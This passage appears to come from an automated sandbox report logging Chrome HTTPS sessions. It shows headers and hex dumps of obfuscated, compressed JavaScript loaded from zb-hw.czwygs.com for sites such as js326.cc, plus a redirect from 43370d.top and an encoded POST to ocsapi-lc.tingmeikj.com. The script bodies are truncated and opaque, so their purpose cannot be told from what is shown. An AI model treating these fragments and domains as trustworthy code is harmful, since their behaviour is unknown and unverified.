                                                                                                                                                          X-CCDN-Expires: 2063157
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ac6c92c9e725f7e844d796653f8e3a93
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528843
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC7496INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 64 67 46 30 41 61 41 62 32 41 47 55 41 47 41 4b 77 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 45 59 71 59 74 67 45 70 53 41 49 69 5a 49 51 41 41 69 52 73 41 54 68 33 59 69 41 33 41 48 6b 77 4e 45 4f 77 42 30 41 45 78 41 4d 4f 61 45 41 41 56 5a 4b 43 43 46 6c 73 41 6e 70 6e 34 69 41 2b 67 35 42 49 41 73 69 68 31 4d 41 4e 69 42 46 6b 41 62 6c 42 65 54 43 42 30 41 49 52 55 41 4c 36 43 41 72 70 32 78 43 49 41 46 69 42 51 65 72 4a 2b 7a 4b 79 63 33 4d 4b 79 49 47 78 4d 73 6d 69 53 61 4e 47 78 4f 76 45 69 58 69 67 41 35 6f 59 55 2b 52 6b 73 37 46 78 6f 6d 4c 6e 35 68 63 55 63 5a 57 78 78 39 67 43 32 49 47 68 4d 54 56 6d 74 37 61 52 35 42 55
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAdgF0AaAb2AGUAGAKwC4AzAVzRgBcBLdTEYqYtgEpSAIiZIQAAiRsATh3YiA3AHkwNEOwB0AExAMOaEAAVZKCCFlsAnpn4iA+g5BIAsih1MANiBFkAblBeTCB0AIRUAL6CArp2xCIAFiBQerJ+zKyc3MKyIGxMsmiSaNGxOvEiXigA5oYU+Rks7FxomLn5hcUcZWxx9gC2IGhMTVmt7aR5BU


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          526192.168.2.55030590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC553OUTGET /pc/240516-03/static/js/components/analysis.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC642INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2164
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:46 GMT
                                                                                                                                                          ETag: "6645cac6-874"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE3[311],EU-GER-frankfurt-GLOBAL1-CACHE12[307,TCP_MISS,309],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ab6959ab2dd567761106fa806b15b55f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1823397
                                                                                                                                                          X-CCDN-Expires: 768603
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC2164INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 72 41 52 67 47 59 42 64 41 47 67 47 38 41 68 41 4f 51 42 45 41 57 41 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 42 39 55 69 46 4b 63 41 6c 4f 51 42 45 72 4a 43 41 41 45 53 54 67 43 64 75 58 43 51 47 34 41 38 6d 41 42 57 49 4c 67 44 6f 41 4a 69 47 62 63 30 49 41 41 71 4b 55 45 45 49 73 34 42 50 54 4d 49 6e 39 2b 49 4a 41 46 6b 55 68 31 67 42 73 51 43 51 6f 41 4e 79 67 2f 56 68 42 47 41 45 49 41 42 67 42 66 55 54 56 4f 54 41 6b 6f 41 47 6f 41 54 67 30 4a 52 4e 44 46 57 52 67 41 58 6d 53 4a 41 46 45 30 2f 41 41 6c 48 4e 49 6f 51 76 4a 46 45 44 52 6a 52 52 5a 32 4c 6c 34 30 54 48 45 38 32 58 35 69 67 41 74 75 4a 48 30 41 45 68 68 47 71 45 34 51
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtArARgGYBdAGgG8AhAOQBEAWALgDMBXNGAFwEt1MB9UiFKcAlOQBErJCAAESTgCduXCQG4A8mABWILgDoAJiGbc0IAAqKUEEIs4BPTMIn9+IJAFkUh1gBsQCQoANyg/VhBGAEIABgBfUTVOTAkoAGoATg0JRNDFWRgAXmSJAFE0/AAlHNIoQvJFEDRjRRZ2Ll40THE82X5igAtuJH0AEhhGqE4Q


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          527192.168.2.55030990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC558OUTGET /pc/240516-03/static/js/components/125/headerTip.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2872
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:01 GMT
                                                                                                                                                          ETag: "6645ca5d-b38"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[4],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE26[3],EU-FRA-paris-GLOBAL1-CACHE19[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063157
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b5545aa15da79ee43d37d60c7f520dc9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528843
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC2872INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 48 4c 67 4e 67 46 30 41 61 41 62 77 43 55 34 42 46 41 65 51 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 64 6b 6b 45 70 77 43 55 5a 41 45 54 4d 6b 49 41 41 52 4a 32 41 4a 30 34 64 52 41 62 6c 70 67 41 56 69 41 34 41 36 41 43 59 68 47 6e 4e 43 41 41 4b 63 6c 42 42 42 7a 32 41 54 30 77 44 52 41 66 55 63 67 6b 41 57 52 53 37 6d 41 47 78 43 6a 79 41 47 35 51 33 73 77 67 39 41 43 45 41 41 77 41 76 6b 4c 4b 51 58 49 79 41 4c 79 63 6d 4b 4b 52 4d 42 43 4d 6f 6b 49 6b 61 45 6c 6b 61 46 41 41 74 6d 47 69 58 42 42 49 41 44 4b 63 73 76 36 36 55 4f 78 51 54 4b 77 63 33 47 69 59 49 6e 49 67 37 4d 78 79 61 47 51 77 75 6d 67 6d 6a 51 41 57 39 45 68 36 42 6c
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHLgNgF0AaAbwCU4BFAeQC4AzAVzRgBcBLdTdkkEpwCUZAETMkIAARJ2AJ04dRAblpgAViA4A6ACYhGnNCAAKclBBBz2AT0wDRAfUcgkAWRS7mAGxCjyAG5Q3swg9ACEAAwAvkLKQXIyALycmKKRMBCMokIkaElkaFAAtmGiXBBIADKcsv66UOxQTKwc3GiYInIg7MxyaGQwumgmjQAW9Eh6Bl


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          528192.168.2.55030690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC553OUTGET /pc/240516-03/static/js/components/125/logo.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2484
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:02 GMT
                                                                                                                                                          ETag: "6645ca5e-9b4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE21[4],EU-FRA-paris-GLOBAL1-CACHE29[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063157
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a02cf04ceda09ac03d006b94b5137130
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528843
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC2484INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 56 6c 77 46 30 41 61 41 62 77 43 55 49 42 6d 41 44 77 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 64 6b 6b 45 6c 41 43 55 5a 41 45 54 4d 6b 49 41 41 52 4a 32 41 4a 30 34 64 52 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 52 70 7a 51 67 41 43 6e 4a 51 51 51 63 39 67 45 39 4d 41 30 51 48 30 6e 49 4a 41 46 6b 55 65 35 67 42 73 51 6f 38 67 41 33 4b 42 39 6d 45 48 6f 41 51 67 41 47 41 46 38 68 5a 57 43 35 4b 52 51 41 58 69 68 4d 55 53 69 59 43 45 5a 52 49 52 49 6b 46 4d 78 30 7a 4d 35 54 41 41 73 38 77 51 79 41 65 6b 43 41 63 51 41 57 50 50 79 66 4e 4a 30 30 54 43 52 38 7a 68 53 79 4e 43 67 41 57 33 44 52 48 78 51 41 63 78 51 41 6d 42
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAVlwF0AaAbwCUIBmADwC4AzAVzRgBcBLdTdkkElACUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KRQAXihMUSiYCEZRIRIkFMx0zM5TAAs8wQyAekCAcQAWPPyfNJ00TCR8zhSyNCgAW3DRHxQAcxQAmB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          529192.168.2.55030790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC554OUTGET /pc/240516-03/static/js/components/125/login.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7640
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:02 GMT
                                                                                                                                                          ETag: "6645ca5e-1dd8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE6[4],EU-FRA-paris-GLOBAL1-CACHE15[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063157
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6a121ef8b657431621e38e2dba74e085
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528843
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC7640INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 64 67 47 59 42 64 41 47 67 47 38 45 41 50 41 52 79 51 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 45 55 39 30 6d 67 43 55 35 41 45 54 4d 6b 49 41 41 52 4a 32 41 4a 30 34 64 52 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 52 70 7a 51 67 41 43 6e 4a 51 51 51 63 39 67 45 39 4d 41 30 51 48 30 6e 49 4a 41 46 6b 55 65 35 67 42 73 51 6f 69 67 41 33 4b 42 39 6d 45 48 6f 41 51 67 41 47 41 46 38 68 5a 57 43 35 4b 53 67 41 58 6a 52 4d 55 51 41 52 50 51 41 4f 59 46 45 68 55 6b 34 30 6e 58 53 6f 51 70 51 30 6a 4b 69 59 43 45 59 43 30 69 51 71 30 51 41 35 41 45 30 71 56 51 61 35 46 4d 78 4f 54 43 46 4d 63 68 6a 53 64 53 30 4f 54 43 51 64 41 46
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAdgGYBdAGgG8EAPARyQC4AzAVzRgBcBLdTEU90mgCU5AETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQoigA3KB9mEHoAQgAGAF8hZWC5KSgAXjRMUQARPQAOYFEhUk40nXSoQpQ0jKiYCEYC0iQq0QA5AE0qVQa5FMxOTCFMchjSdS0OTCQdAF


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          530192.168.2.55030890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC553OUTGET /pc/240516-03/static/js/components/125/menu.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2312
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:02 GMT
                                                                                                                                                          ETag: "6645ca5e-908"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE21[3],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063157
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4bd20e3b863608c89575074a0b1796dc
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528843
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC2312INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 5a 67 46 59 42 64 41 47 67 47 38 41 62 41 65 51 48 55 49 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 77 39 4c 53 6b 51 41 53 6e 49 41 69 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 6d 49 44 63 31 4d 41 43 73 51 6e 41 48 51 41 54 45 45 79 35 6f 51 41 42 58 6b 6f 49 49 65 52 77 43 65 6d 51 57 49 44 36 54 6b 45 67 43 79 4b 50 53 30 6f 67 78 46 41 44 63 6f 53 68 59 51 42 67 42 43 41 41 59 41 58 32 45 56 49 50 6c 70 4b 41 42 65 45 45 77 78 53 4a 67 49 4a 6a 46 68 55 69 35 55 39 4d 69 75 55 77 41 4c 58 4e 49 6b 56 4a 30 30 54 43 34 38 6c 6d 54 79 47 42 51 41 57 77 68 30 45 44 51 4f 4a 41 5a 79 56 71 36 57 41 47 55 57 4d 47 59 32 54 68 35 61 30 58
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAZgFYBdAGgG8AbAeQHUIAuAMwFc0YAXAS3Uw9LSkQASnIAiFkhAACJBwBOXTmIDc1MACsQnAHQATEEy5oQABXkoIIeRwCemQWID6TkEgCyKPS0ogxFADcoShYQBgBCAAYAX2EVIPlpKABeEEwxSJgIJjFhUi5U9MiuUwALXNIkVJ00TC48lmTyGBQAWwh0EDQOJAZyVq6WAGUWMGY2Th5a0X


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          531192.168.2.55026838.174.148.164434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC729OUTGET /?__CBK=3252ccf41c5cb1a622b2e7e83e835e4041717972875_12137500 HTTP/1.1
                                                                                                                                                          Host: 43370d.top
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Referer: https://43370d.top/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC20INHTTP/1.1 302 Found
                                                                                                                                                          2024-06-09 22:41:19 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:19 UTC19INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 0
                                                                                                                                                          2024-06-09 22:41:19 UTC13INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 2f 0d 0a
                                                                                                                                                          Data Ascii: Location: /
                                                                                                                                                          2024-06-09 22:41:19 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          532192.168.2.550291103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC678OUTPOST /zb-cloud/pwv/sn.website.pronotice.list HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 532
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC532OUTData Raw: 6a 73 6f 6e 3d 70 77 76 7c 31 33 7c 49 48 72 49 4c 4c 46 75 64 48 41 73 42 6b 51 6d 5a 30 59 61 50 74 50 61 58 76 68 33 52 6e 66 33 51 74 55 77 4b 42 4e 6f 50 50 47 6c 4c 77 49 65 53 71 52 75 50 78 7a 67 71 32 35 7a 6b 48 5a 66 42 6d 53 73 50 30 4f 68 4a 6f 4d 78 4f 74 41 6a 4b 68 4a 62 4e 78 59 79 4c 78 58 7a 42 50 4f 6b 65 32 42 76 54 79 4a 74 4e 30 52 66 42 6d 54 67 65 73 35 33 56 54 4f 64 7a 41 42 6c 4a 6c 5a 7a 72 32 35 77 71 53 79 69 4e 47 35 79 63 50 4b 30 46 57 54 69 51 49 4b 4c 4b 47 43 6e 66 51 4d 62 49 53 31 77 4f 58 48 62 54 54 4c 5a 48 55 74 44 57 46 56 78 71 32 34 7a 53 6c 41 69 49 30 48 77 57 71 59 31 66 42 42 35 57 4e 58 62 54 41 4d 4e 46 51 4e 63 63 4a 46 74 61 43 6a 6c 5a 55 56 6b 57 53 42 50 50 56 41 76 7a 47 42 67 55 53 56 74 4e 77 43
                                                                                                                                                          Data Ascii: json=pwv|13|IHrILLFudHAsBkQmZ0YaPtPaXvh3Rnf3QtUwKBNoPPGlLwIeSqRuPxzgq25zkHZfBmSsP0OhJoMxOtAjKhJbNxYyLxXzBPOke2BvTyJtN0RfBmTges53VTOdzABlJlZzr25wqSyiNG5ycPK0FWTiQIKLKGCnfQMbIS1wOXHbTTLZHUtDWFVxq24zSlAiI0HwWqY1fBB5WNXbTAMNFQNccJFtaCjlZUVkWSBPPVAvzGBgUSVtNwC
                                                                                                                                                          2024-06-09 22:41:19 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:19 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 39 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          2024-06-09 22:41:19 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:19 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:19 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
